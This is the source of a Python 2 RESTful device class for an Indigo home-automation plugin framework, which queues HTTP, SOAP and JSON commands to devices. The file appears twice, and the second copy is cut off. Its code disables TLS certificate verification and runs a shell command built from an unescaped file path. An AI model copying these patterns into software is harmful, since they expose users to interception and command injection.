# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
# Python imports
#/////////////////////////////////////////////////////////////////////////////////////////
import functools
import httplib
import indigo
import Queue
import os
import re
import string
import subprocess
import sys
import threading
import telnetlib
import time
import urllib
import urllib2
from urlparse import urlparse
import requests
from requests.auth import HTTPDigestAuth
import RPFrameworkPlugin
import RPFrameworkCommand
import RPFrameworkDevice
import RPFrameworkNetworkingWOL
import RPFrameworkUtils
#/////////////////////////////////////////////////////////////////////////////////////////
# Constants and configuration variables
#/////////////////////////////////////////////////////////////////////////////////////////
CMD_RESTFUL_PUT = u'RESTFUL_PUT'
CMD_RESTFUL_GET = u'RESTFUL_GET'
CMD_SOAP_REQUEST = u'SOAP_REQUEST'
CMD_JSON_REQUEST = u'JSON_REQUEST'
CMD_DOWNLOADFILE = u'DOWNLOAD_FILE'
CMD_DOWNLOADIMAGE = u'DOWNLOAD_IMAGE'
GUI_CONFIG_RESTFULSTATUSPOLL_INTERVALPROPERTY = u'updateStatusPollerIntervalProperty'
GUI_CONFIG_RESTFULSTATUSPOLL_ACTIONID = u'updateStatusPollerActionId'
GUI_CONFIG_RESTFULSTATUSPOLL_STARTUPDELAY = u'updateStatusPollerStartupDelay'
GUI_CONFIG_RESTFULDEV_EMPTYQUEUE_SPEEDUPCYCLES = u'emptyQueueReducedWaitCycles'
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
# RPFrameworkRESTfulDevice
# This class is a concrete implementation of the RPFrameworkDevice as a device which
# communicates via a REST style HTTP connection.
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
class RPFrameworkRESTfulDevice(RPFrameworkDevice.RPFrameworkDevice):
#/////////////////////////////////////////////////////////////////////////////////////
# Class construction and destruction methods
#/////////////////////////////////////////////////////////////////////////////////////
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# Constructor called once upon plugin class receiving a command to start device
# communication. Defers to the base class for processing but initializes params
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def __init__(self, plugin, device):
super(RPFrameworkRESTfulDevice, self).__init__(plugin, device)
#/////////////////////////////////////////////////////////////////////////////////////
# Processing and command functions
#/////////////////////////////////////////////////////////////////////////////////////
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine is designed to run in a concurrent thread and will continuously monitor
# the commands queue for work to do.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def concurrentCommandProcessingThread(self, commandQueue):
try:
self.hostPlugin.logger.debug(u'Concurrent Processing Thread started for device {0}'.format(self.indigoDevice.id))
# obtain the IP or host address that will be used in connecting to the
# RESTful service via a function call to allow overrides
deviceHTTPAddress = self.getRESTfulDeviceAddress()
if deviceHTTPAddress is None:
self.hostPlugin.logger.error(u'No IP address specified for device {0}; ending command processing thread.'.format(self.indigoDevice.id))
return
# retrieve any configuration information that may have been setup in the
# plugin configuration and/or device configuration
updateStatusPollerPropertyName = self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, GUI_CONFIG_RESTFULSTATUSPOLL_INTERVALPROPERTY, u'updateInterval')
updateStatusPollerInterval = int(self.indigoDevice.pluginProps.get(updateStatusPollerPropertyName, u'90'))
updateStatusPollerNextRun = None
updateStatusPollerActionId = self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, GUI_CONFIG_RESTFULSTATUSPOLL_ACTIONID, u'')
emptyQueueReducedWaitCycles = int(self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, GUI_CONFIG_RESTFULDEV_EMPTYQUEUE_SPEEDUPCYCLES, u'80'))
# begin the infinite loop which will run as long as the queue contains commands
# and we have not received an explicit shutdown request
continueProcessingCommands = True
lastQueuedCommandCompleted = 0
while continueProcessingCommands == True:
# process pending commands now...
while not commandQueue.empty():
lenQueue = commandQueue.qsize()
self.hostPlugin.logger.threaddebug(u'Command queue has {0} command(s) waiting'.format(lenQueue))
# the command name will identify what action should be taken... we will handle the known
# commands and dispatch out to the device implementation, if necessary, to handle unknown
# commands
command = commandQueue.get()
if command.commandName == RPFrameworkCommand.CMD_INITIALIZE_CONNECTION:
# specialized command to instanciate the concurrent thread
# safely ignore this... just used to spin up the thread
self.hostPlugin.logger.threaddebug(u'Create connection command de-queued')
# if the device supports polling for status, it may be initiated here now; however, we should implement a pause to ensure that
# devices are created properly (RESTFul devices may respond too fast since no connection need be established)
statusUpdateStartupDelay = float(self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, GUI_CONFIG_RESTFULSTATUSPOLL_STARTUPDELAY, u'3'))
if statusUpdateStartupDelay > 0.0:
commandQueue.put(RPFrameworkCommand.RPFrameworkCommand(RPFrameworkCommand.CMD_PAUSE_PROCESSING, commandPayload=str(statusUpdateStartupDelay)))
commandQueue.put(RPFrameworkCommand.RPFrameworkCommand(RPFrameworkCommand.CMD_UPDATE_DEVICE_STATUS_FULL, parentAction=updateStatusPollerActionId))
elif command.commandName == RPFrameworkCommand.CMD_TERMINATE_PROCESSING_THREAD:
# a specialized command designed to stop the processing thread indigo
# the event of a shutdown
continueProcessingCommands = False
elif command.commandName == RPFrameworkCommand.CMD_PAUSE_PROCESSING:
# the amount of time to sleep should be a float found in the
# payload of the command
try:
pauseTime = float(command.commandPayload)
self.hostPlugin.logger.threaddebug(u'Initiating sleep of {0} seconds from command.'.format(pauseTime))
time.sleep(pauseTime)
except:
self.hostPlugin.logger.warning(u'Invalid pause time requested')
elif command.commandName == RPFrameworkCommand.CMD_UPDATE_DEVICE_STATUS_FULL:
# this command instructs the plugin to update the full status of the device (all statuses
# that may be read from the device should be read)
if updateStatusPollerActionId != u'':
self.hostPlugin.logger.debug(u'Executing full status update request...')
self.hostPlugin.executeAction(None, indigoActionId=updateStatusPollerActionId, indigoDeviceId=self.indigoDevice.id, paramValues=None)
updateStatusPollerNextRun = time.time() + updateStatusPollerInterval
else:
self.hostPlugin.logger.threaddebug(u'Ignoring status update request, no action specified to update device status')
elif command.commandName == RPFrameworkCommand.CMD_NETWORKING_WOL_REQUEST:
# this is a request to send a Wake-On-LAN request to a network-enabled device
# the command payload should be the MAC address of the device to wake up
try:
RPFrameworkNetworkingWOL.sendWakeOnLAN(command.commandPayload)
except:
self.hostPlugin.logger.error(u'Failed to send Wake-on-LAN packet')
elif command.commandName == CMD_RESTFUL_GET or command.commandName == CMD_RESTFUL_PUT or command.commandName == CMD_DOWNLOADFILE or command.commandName == CMD_DOWNLOADIMAGE:
try:
self.hostPlugin.logger.debug(u'Processing GET operation: {0}'.format(command.commandPayload))
# gather all of the parameters from the command payload
# the payload should have the following format:
# [0] => request method (http|https|etc.)
# [1] => path for the GET operation
# [2] => authentication type: none|basic|digest
# [3] => username
# [4] => password
#
# CMD_DOWNLOADFILE or CMD_DOWNLOADIMAGE
# [5] => download filename/path
# [6] => image resize width
# [7] => image resize height
#
# CMD_RESTFUL_PUT
# [5] => data to post as the body (if any, may be blank)
commandPayloadList = command.getPayloadAsList()
fullGetUrl = commandPayloadList[0] + u'://' + deviceHTTPAddress[0] + u':' + RPFrameworkUtils.to_unicode(deviceHTTPAddress[1]) + commandPayloadList[1]
self.hostPlugin.logger.threaddebug(u'Full URL for GET: {0}'.format(fullGetUrl))
customHeaders = {}
self.addCustomHTTPHeaders(customHeaders)
authenticationParam = None
authenticationType = u'none'
username = u''
password = u''
if len(commandPayloadList) >= 3:
authenticationType = commandPayloadList[2]
if len(commandPayloadList) >= 4:
username = commandPayloadList[3]
if len(commandPayloadList) >= 5:
password = commandPayloadList[4]
if authenticationType != 'none' and username != u'':
self.hostPlugin.logger.threaddebug(u'Using login credentials... Username=> {0}; Password=>{1} <PASSWORD>'.format(username, len(password)))
if authenticationType.lower() == 'digest':
self.hostPlugin.logger.threaddebug(u'Enabling digest authentication')
authenticationParam = HTTPDigestAuth(username, password)
else:
authenticationParam = (username, password)
# execute the URL fetching depending upon the method requested
if command.commandName == CMD_RESTFUL_GET or command.commandName == CMD_DOWNLOADFILE or command.commandName == CMD_DOWNLOADIMAGE:
responseObj = requests.get(fullGetUrl, auth=authenticationParam, headers=customHeaders, verify=False)
elif command.commandName == CMD_RESTFUL_PUT:
dataToPost = None
if len(commandPayloadList) >= 6:
dataToPost = commandPayloadList[5]
responseObj = requests.post(fullGetUrl, auth=authenticationParam, headers=customHeaders, verify=False, data=dataToPost)
# if the network command failed then allow the error processor to handle the issue
if responseObj.status_code == 200:
# the response handling will depend upon the type of command... binary returns must be
# handled separately from (expected) text-based ones
if command.commandName == CMD_DOWNLOADFILE or command.commandName == CMD_DOWNLOADIMAGE:
# this is a binary return that should be saved to the file system without modification
if len(commandPayloadList) >= 6:
saveLocation = commandPayloadList[5]
# execute the actual save from the binary response stream
try:
localFile = open(RPFrameworkUtils.to_str(saveLocation), "wb")
localFile.write(responseObj.content)
self.hostPlugin.logger.threaddebug(u'Command Response: [{0}] -=- binary data written to {1}-=-'.format(responseObj.status_code, saveLocation))
if command.commandName == CMD_DOWNLOADIMAGE:
imageResizeWidth = 0
imageResizeHeight = 0
if len(command.commandPayload) >= 7:
imageResizeWidth = int(command.commandPayload[6])
if len(command.commandPayload) >= 8:
imageResizeHeight = int(command.commandPayload[7])
resizeCommandLine = u''
if imageResizeWidth > 0 and imageResizeHeight > 0:
# we have a specific size as a target...
resizeCommandLine = u'sips -z {0} {1} {2}'.format(imageResizeHeight, imageResizeWidth, saveLocation)
elif imageResizeWidth > 0:
# we have a maximum size measurement
resizeCommandLine = u'sips -Z {0} {1}'.format(imageResizeWidth, saveLocation)
# if a command line has been formed, fire that off now...
if resizeCommandLine == u'':
self.hostPlugin.logger.debug(u'No image size specified for {0}; skipping resize.'.format(saveLocation))
else:
self.hostPlugin.logger.threaddebug(u'Executing resize via command line "{0}"'.format(resizeCommandLine))
try:
subprocess.Popen(resizeCommandLine, shell=True)
self.hostPlugin.logger.debug(u'{0} resized via sip shell command'.format(saveLocation))
except:
self.hostPlugin.logger.error(u'Error resizing image via sips')
# we have completed the download and processing successfully... allow the
# device (or its descendants) to process successful operations
self.notifySuccessfulDownload(command, saveLocation)
finally:
if not localFile is None:
localFile.close()
else:
self.hostPlugin.logger.error(u'Unable to complete download action - no filename specified')
else:
# handle this return as a text-based return
self.hostPlugin.logger.threaddebug(u'Command Response: [{0}] {1}'.format(responseObj.status_code, responseObj.text))
self.hostPlugin.logger.threaddebug(u'{0} command completed; beginning response processing'.format(command.commandName))
self.handleDeviceTextResponse(responseObj, command)
self.hostPlugin.logger.threaddebug(u'{0} command response processing completed'.format(command.commandName))
elif responseObj.status_code == 401:
self.handleRESTfulError(command, u'401 - Unauthorized', responseObj)
else:
self.handleRESTfulError(command, str(responseObj.status_code), responseObj)
except Exception as e:
# the response value really should not be defined here as it bailed without
# catching any of our response error conditions
self.handleRESTfulError(command, e, None)
elif command.commandName == CMD_SOAP_REQUEST or command.commandName == CMD_JSON_REQUEST:
responseObj = None
try:
# this is to post a SOAP request to a web service... this will be similar to a restful put request
# but will contain a body payload
self.hostPlugin.logger.threaddebug(u'Received SOAP/JSON command request: {0}'.format(command.commandPayload))
soapPayloadParser = re.compile(r"^\s*([^\n]+)\n\s*([^\n]+)\n(.*)$", re.DOTALL)
soapPayloadData = soapPayloadParser.match(command.commandPayload)
soapPath = soapPayloadData.group(1).strip()
soapAction = soapPayloadData.group(2).strip()
soapBody = soapPayloadData.group(3).strip()
fullGetUrl = u'http://' + deviceHTTPAddress[0] + u':' + RPFrameworkUtils.to_str(deviceHTTPAddress[1]) + RPFrameworkUtils.to_str(soapPath)
self.hostPlugin.logger.debug(u'Processing SOAP/JSON operation to {0}'.format(fullGetUrl))
customHeaders = {}
self.addCustomHTTPHeaders(customHeaders)
if command.commandName == CMD_SOAP_REQUEST:
customHeaders["Content-type"] = "text/xml; charset=\"UTF-8\""
customHeaders["SOAPAction"] = RPFrameworkUtils.to_str(soapAction)
else:
customHeaders["Content-type"] = "application/json"
# execute the URL post to the web service
self.hostPlugin.logger.threaddebug(u'Sending SOAP/JSON request:\n{0}'.format(soapBody))
self.hostPlugin.logger.threaddebug(u'Using headers: \n{0}'.format(customHeaders))
responseObj = requests.post(fullGetUrl, headers=customHeaders, verify=False, data=RPFrameworkUtils.to_str(soapBody))
if responseObj.status_code == 200:
# handle this return as a text-based return
self.hostPlugin.logger.threaddebug(u'Command Response: [{0}] {1}'.format(responseObj.status_code, responseObj.text))
self.hostPlugin.logger.threaddebug(u'{0} command completed; beginning response processing'.format(command.commandName))
self.handleDeviceTextResponse(responseObj, command)
self.hostPlugin.logger.threaddebug(u'{0} command response processing completed'.format(command.commandName))
else:
self.hostPlugin.logger.threaddebug(u'Command Response was not HTTP OK, handling RESTful error')
self.handleRESTfulError(command, str(responseObj.status_code), responseObj)
except Exception as e:
self.handleRESTfulError(command, e, responseObj)
else:
# this is an unknown command; dispatch it to another routine which is
# able to handle the commands (to be overridden for individual devices)
self.handleUnmanagedCommandInQueue(deviceHTTPAddress, command)
# if the command has a pause defined for after it is completed then we
# should execute that pause now
if command.postCommandPause > 0.0 and continueProcessingCommands == True:
self.hostPlugin.logger.threaddebug(u'Post Command Pause: {0}'.format(command.postCommandPause))
time.sleep(command.postCommandPause)
# complete the dequeuing of the command, allowing the next
# command in queue to rise to the top
commandQueue.task_done()
lastQueuedCommandCompleted = emptyQueueReducedWaitCycles
# when the queue is empty, pause a bit on each iteration
if continueProcessingCommands == True:
# if we have just completed a command recently, half the amount of
# wait time, assuming that a subsequent command could be forthcoming
if lastQueuedCommandCompleted > 0:
time.sleep(self.emptyQueueProcessingThreadSleepTime/2)
lastQueuedCommandCompleted = lastQueuedCommandCompleted - 1
else:
time.sleep(self.emptyQueueProcessingThreadSleepTime)
# check to see if we need to issue an update...
if updateStatusPollerNextRun is not None and time.time() > updateStatusPollerNextRun:
commandQueue.put(RPFrameworkCommand.RPFrameworkCommand(RPFrameworkCommand.CMD_UPDATE_DEVICE_STATUS_FULL, parentAction=updateStatusPollerActionId))
# handle any exceptions that are thrown during execution of the plugin... note that this
# should terminate the thread, but it may get spun back up again
except SystemExit:
pass
except Exception:
self.hostPlugin.logger.exception(u'Exception in background processing')
except:
self.hostPlugin.logger.exception(u'Exception in background processing')
finally:
self.hostPlugin.logger.debug(u'Command thread ending processing')
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine should return the HTTP address that will be used to connect to the
# RESTful device. It may connect via IP address or a host name
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def getRESTfulDeviceAddress(self):
return None
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine should be overridden in individual device classes whenever they must
# handle custom commands that are not already defined
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def handleUnmanagedCommandInQueue(self, deviceHTTPAddress, rpCommand):
pass
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine will be called prior to any network operation to allow the addition
# of custom headers to the request (does not include file download)
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def addCustomHTTPHeaders(self, httpRequest):
pass
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine will process any response from the device following the list of
# response objects defined for this device type. For telnet this will always be
# a text string
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def handleDeviceTextResponse(self, responseObj, rpCommand):
# loop through the list of response definitions defined in the (base) class
# and determine if any match
responseText = responseObj.text
for rpResponse in self.hostPlugin.getDeviceResponseDefinitions(self.indigoDevice.deviceTypeId):
if rpResponse.isResponseMatch(responseText, rpCommand, self, self.hostPlugin):
self.hostPlugin.logger.threaddebug(u'Found response match: {0}'.format(rpResponse.responseId))
rpResponse.executeEffects(responseText, rpCommand, self, self.hostPlugin)
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine will handle an error as thrown by the REST call... it allows
# descendant classes to do their own processing
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def handleRESTfulError(self, rpCommand, err, response=None):
if rpCommand.commandName == CMD_RESTFUL_PUT or rpCommand.commandName == CMD_RESTFUL_GET:
self.hostPlugin.logger.exception(u'An error occurred executing the GET/PUT request (Device: {0}): {1}'.format(self.indigoDevice.id, err))
else:
self.hostPlugin.logger.exception(u'An error occurred processing the SOAP/JSON POST request: (Device: {0}): {1}'.format(self.indigoDevice.id, err))
if not response is None and not response.text is None:
self.hostPlugin.logger.debug(RPFrameworkUtils.to_unicode(response.text))
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine will handle notification to the device whenever a file was successfully
# downloaded via a DOWNLOAD_FILE or DOWNLOAD_IMAGE command
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def notifySuccessfulDownload(self, rpCommand, outputFileName):
pass
|
Network Remote.indigoPlugin/Contents/Server Plugin/RPFramework/RPFrameworkRESTfulDevice.py
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
# RPFrameworkRESTfulDevice by RogueProeliator <<EMAIL>>
# This class is a concrete implementation of the RPFrameworkDevice as a device which
# communicates via a REST style HTTP connection.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
# Python imports
#/////////////////////////////////////////////////////////////////////////////////////////
import functools
import httplib
import indigo
import Queue
import os
import re
import string
import subprocess
import sys
import threading
import telnetlib
import time
import urllib
import urllib2
from urlparse import urlparse
import requests
from requests.auth import HTTPDigestAuth
import RPFrameworkPlugin
import RPFrameworkCommand
import RPFrameworkDevice
import RPFrameworkNetworkingWOL
import RPFrameworkUtils
#/////////////////////////////////////////////////////////////////////////////////////////
# Constants and configuration variables
#/////////////////////////////////////////////////////////////////////////////////////////
CMD_RESTFUL_PUT = u'RESTFUL_PUT'
CMD_RESTFUL_GET = u'RESTFUL_GET'
CMD_SOAP_REQUEST = u'SOAP_REQUEST'
CMD_JSON_REQUEST = u'JSON_REQUEST'
CMD_DOWNLOADFILE = u'DOWNLOAD_FILE'
CMD_DOWNLOADIMAGE = u'DOWNLOAD_IMAGE'
GUI_CONFIG_RESTFULSTATUSPOLL_INTERVALPROPERTY = u'updateStatusPollerIntervalProperty'
GUI_CONFIG_RESTFULSTATUSPOLL_ACTIONID = u'updateStatusPollerActionId'
GUI_CONFIG_RESTFULSTATUSPOLL_STARTUPDELAY = u'updateStatusPollerStartupDelay'
GUI_CONFIG_RESTFULDEV_EMPTYQUEUE_SPEEDUPCYCLES = u'emptyQueueReducedWaitCycles'
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
# RPFrameworkRESTfulDevice
# This class is a concrete implementation of the RPFrameworkDevice as a device which
# communicates via a REST style HTTP connection.
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
class RPFrameworkRESTfulDevice(RPFrameworkDevice.RPFrameworkDevice):
#/////////////////////////////////////////////////////////////////////////////////////
# Class construction and destruction methods
#/////////////////////////////////////////////////////////////////////////////////////
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# Constructor called once upon plugin class receiving a command to start device
# communication. Defers to the base class for processing but initializes params
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def __init__(self, plugin, device):
super(RPFrameworkRESTfulDevice, self).__init__(plugin, device)
#/////////////////////////////////////////////////////////////////////////////////////
# Processing and command functions
#/////////////////////////////////////////////////////////////////////////////////////
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine is designed to run in a concurrent thread and will continuously monitor
# the commands queue for work to do.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def concurrentCommandProcessingThread(self, commandQueue):
try:
self.hostPlugin.logger.debug(u'Concurrent Processing Thread started for device {0}'.format(self.indigoDevice.id))
# obtain the IP or host address that will be used in connecting to the
# RESTful service via a function call to allow overrides
deviceHTTPAddress = self.getRESTfulDeviceAddress()
if deviceHTTPAddress is None:
self.hostPlugin.logger.error(u'No IP address specified for device {0}; ending command processing thread.'.format(self.indigoDevice.id))
return
# retrieve any configuration information that may have been setup in the
# plugin configuration and/or device configuration
updateStatusPollerPropertyName = self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, GUI_CONFIG_RESTFULSTATUSPOLL_INTERVALPROPERTY, u'updateInterval')
updateStatusPollerInterval = int(self.indigoDevice.pluginProps.get(updateStatusPollerPropertyName, u'90'))
updateStatusPollerNextRun = None
updateStatusPollerActionId = self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, GUI_CONFIG_RESTFULSTATUSPOLL_ACTIONID, u'')
emptyQueueReducedWaitCycles = int(self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, GUI_CONFIG_RESTFULDEV_EMPTYQUEUE_SPEEDUPCYCLES, u'80'))
# begin the infinite loop which will run as long as the queue contains commands
# and we have not received an explicit shutdown request
continueProcessingCommands = True
lastQueuedCommandCompleted = 0
while continueProcessingCommands == True:
# process pending commands now...
while not commandQueue.empty():
lenQueue = commandQueue.qsize()
self.hostPlugin.logger.threaddebug(u'Command queue has {0} command(s) waiting'.format(lenQueue))
# the command name will identify what action should be taken... we will handle the known
# commands and dispatch out to the device implementation, if necessary, to handle unknown
# commands
command = commandQueue.get()
if command.commandName == RPFrameworkCommand.CMD_INITIALIZE_CONNECTION:
# specialized command to instanciate the concurrent thread
# safely ignore this... just used to spin up the thread
self.hostPlugin.logger.threaddebug(u'Create connection command de-queued')
# if the device supports polling for status, it may be initiated here now; however, we should implement a pause to ensure that
# devices are created properly (RESTFul devices may respond too fast since no connection need be established)
statusUpdateStartupDelay = float(self.hostPlugin.getGUIConfigValue(self.indigoDevice.deviceTypeId, GUI_CONFIG_RESTFULSTATUSPOLL_STARTUPDELAY, u'3'))
if statusUpdateStartupDelay > 0.0:
commandQueue.put(RPFrameworkCommand.RPFrameworkCommand(RPFrameworkCommand.CMD_PAUSE_PROCESSING, commandPayload=str(statusUpdateStartupDelay)))
commandQueue.put(RPFrameworkCommand.RPFrameworkCommand(RPFrameworkCommand.CMD_UPDATE_DEVICE_STATUS_FULL, parentAction=updateStatusPollerActionId))
elif command.commandName == RPFrameworkCommand.CMD_TERMINATE_PROCESSING_THREAD:
# a specialized command designed to stop the processing thread indigo
# the event of a shutdown
continueProcessingCommands = False
elif command.commandName == RPFrameworkCommand.CMD_PAUSE_PROCESSING:
# the amount of time to sleep should be a float found in the
# payload of the command
try:
pauseTime = float(command.commandPayload)
self.hostPlugin.logger.threaddebug(u'Initiating sleep of {0} seconds from command.'.format(pauseTime))
time.sleep(pauseTime)
except:
self.hostPlugin.logger.warning(u'Invalid pause time requested')
elif command.commandName == RPFrameworkCommand.CMD_UPDATE_DEVICE_STATUS_FULL:
# this command instructs the plugin to update the full status of the device (all statuses
# that may be read from the device should be read)
if updateStatusPollerActionId != u'':
self.hostPlugin.logger.debug(u'Executing full status update request...')
self.hostPlugin.executeAction(None, indigoActionId=updateStatusPollerActionId, indigoDeviceId=self.indigoDevice.id, paramValues=None)
updateStatusPollerNextRun = time.time() + updateStatusPollerInterval
else:
self.hostPlugin.logger.threaddebug(u'Ignoring status update request, no action specified to update device status')
elif command.commandName == RPFrameworkCommand.CMD_NETWORKING_WOL_REQUEST:
# this is a request to send a Wake-On-LAN request to a network-enabled device
# the command payload should be the MAC address of the device to wake up
try:
RPFrameworkNetworkingWOL.sendWakeOnLAN(command.commandPayload)
except:
self.hostPlugin.logger.error(u'Failed to send Wake-on-LAN packet')
elif command.commandName == CMD_RESTFUL_GET or command.commandName == CMD_RESTFUL_PUT or command.commandName == CMD_DOWNLOADFILE or command.commandName == CMD_DOWNLOADIMAGE:
try:
self.hostPlugin.logger.debug(u'Processing GET operation: {0}'.format(command.commandPayload))
# gather all of the parameters from the command payload
# the payload should have the following format:
# [0] => request method (http|https|etc.)
# [1] => path for the GET operation
# [2] => authentication type: none|basic|digest
# [3] => username
# [4] => password
#
# CMD_DOWNLOADFILE or CMD_DOWNLOADIMAGE
# [5] => download filename/path
# [6] => image resize width
# [7] => image resize height
#
# CMD_RESTFUL_PUT
# [5] => data to post as the body (if any, may be blank)
commandPayloadList = command.getPayloadAsList()
fullGetUrl = commandPayloadList[0] + u'://' + deviceHTTPAddress[0] + u':' + RPFrameworkUtils.to_unicode(deviceHTTPAddress[1]) + commandPayloadList[1]
self.hostPlugin.logger.threaddebug(u'Full URL for GET: {0}'.format(fullGetUrl))
customHeaders = {}
self.addCustomHTTPHeaders(customHeaders)
authenticationParam = None
authenticationType = u'none'
username = u''
password = u''
if len(commandPayloadList) >= 3:
authenticationType = commandPayloadList[2]
if len(commandPayloadList) >= 4:
username = commandPayloadList[3]
if len(commandPayloadList) >= 5:
password = commandPayloadList[4]
if authenticationType != 'none' and username != u'':
self.hostPlugin.logger.threaddebug(u'Using login credentials... Username=> {0}; Password=>{1} <PASSWORD>'.format(username, len(password)))
if authenticationType.lower() == 'digest':
self.hostPlugin.logger.threaddebug(u'Enabling digest authentication')
authenticationParam = HTTPDigestAuth(username, password)
else:
authenticationParam = (username, password)
# execute the URL fetching depending upon the method requested
if command.commandName == CMD_RESTFUL_GET or command.commandName == CMD_DOWNLOADFILE or command.commandName == CMD_DOWNLOADIMAGE:
responseObj = requests.get(fullGetUrl, auth=authenticationParam, headers=customHeaders, verify=False)
elif command.commandName == CMD_RESTFUL_PUT:
dataToPost = None
if len(commandPayloadList) >= 6:
dataToPost = commandPayloadList[5]
responseObj = requests.post(fullGetUrl, auth=authenticationParam, headers=customHeaders, verify=False, data=dataToPost)
# if the network command failed then allow the error processor to handle the issue
if responseObj.status_code == 200:
# the response handling will depend upon the type of command... binary returns must be
# handled separately from (expected) text-based ones
if command.commandName == CMD_DOWNLOADFILE or command.commandName == CMD_DOWNLOADIMAGE:
# this is a binary return that should be saved to the file system without modification
if len(commandPayloadList) >= 6:
saveLocation = commandPayloadList[5]
# execute the actual save from the binary response stream
try:
localFile = open(RPFrameworkUtils.to_str(saveLocation), "wb")
localFile.write(responseObj.content)
